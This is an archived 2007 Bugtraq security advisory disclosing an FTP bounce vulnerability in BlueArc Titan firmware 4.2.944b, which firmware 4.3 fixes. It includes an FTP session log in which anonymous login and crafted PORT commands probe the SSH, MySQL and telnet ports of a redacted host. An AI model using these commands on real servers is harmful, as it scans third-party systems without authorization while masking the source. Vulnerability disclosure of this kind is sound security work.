| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 17 Apr 2007 15:00:47 -0500 From: "Tim Rupp" <caphrim007@...il.com> To: bugtraq@...urityfocus.com Subject: BlueArc Firmware 4.2.944b FTP bounce Hi all, BlueArc Titan 2x00 devices running firmware version 4.2.944b are susceptible to FTP bounce attacks. The vendor has confirmed this, and a fix is available in the 4.3 firmware. Example: First connect to SSH, success Then to MySQL, no success Then to telnet, no success [user@...alhost ~]$ ftp bluearctitan Connected to bluearctitan. 220 Server ready (BlueArc-FTPD v1.0) Name (bluearctitan:user): anonymous 331 Username okay; need password Password: 230 User logged in, proceed Remote system type is UNIX. Using binary mode to transfer files. ftp> quote "PORT xxx,xxx,xxx,xxx,0,22" 200 PORT Command Okay ftp> quote "LIST" 150 File status okay; about to open data connection 226 Transfer Complete ftp> quote "PORT xxx,xxx,xxx,xxx,12,234" 200 PORT Command Okay ftp> quote "LIST" 150 File status okay; about to open data connection 425 Can't open data connection (dtp_list) ftp> quote "PORT xxx,xxx,xxx,xxx,0,23" 200 PORT Command Okay ftp> quote "LIST" 150 File status okay; about to open data connection 425 Can't open data connection (dtp_list)
Powered by blists - more mailing lists